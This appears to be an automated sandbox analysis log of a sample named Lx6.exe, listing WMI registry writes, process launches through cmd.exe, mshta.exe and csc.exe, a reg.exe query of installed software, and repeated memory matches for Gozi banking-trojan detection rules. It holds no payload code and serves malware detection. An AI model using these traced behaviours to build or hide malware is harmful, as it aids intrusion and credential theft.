Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\Lx6.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\conhost.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00757003
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0077115B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00772AC4
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00765CFD
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00767702
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075579B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03042AC4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0304115B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03027003
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03037702
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302579B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03035CFD
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E1AE8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E8454
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FBB44
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB405B10
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3EE388
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F8B60
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40B28C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40321C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3EC29C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB304
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E92E4
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB408174
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB409978
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB16C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F5954
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F0A0C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F51D0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB403878
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F10BC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F8890
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FD774
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E4770
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E77AC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB409000
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB405FC0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E5FD0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F6E4C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40AE38
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F1E9C
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FB6F0
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FED64
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB403D70
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB402578
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F3DBC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E75A4
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4045BC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F6428
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3FE434
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E6458
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3ECC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F98454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F91AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA0A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA51D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB8174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB9978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA5954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA10BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA8890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB3878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB9000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F95FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB5FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F977AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAD774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F94770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA1E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA6E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBAE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB45BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA3DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F975A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB2578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB3D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAED64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9CC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F96458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAE434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA6428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9E388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA8B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FABB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB5B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FAB304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F992E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9C29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBB28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F8454
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F1AE8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D719000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D715FC0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F5FD0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D708890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D713878
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B6F0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F77AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70D774
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F4770
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71321C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D700A0C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7051D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FC29C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71B28C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7010BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7188C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B16C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D718174
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D719978
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D705954
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70E434
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D706428
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FCC54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F6458
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D715B10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70B304
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F92E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6FE388
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D708B60
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70BB44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D71AE38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D703DBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D7145BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D701E9C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D706E4C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F75A4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D713D70
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D712578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D70ED64

Source: C:\Users\user\Desktop\Lx6.exe

Code function: 0_2_0075C875 CreateProcessAsUserA,

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

Source: Lx6.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
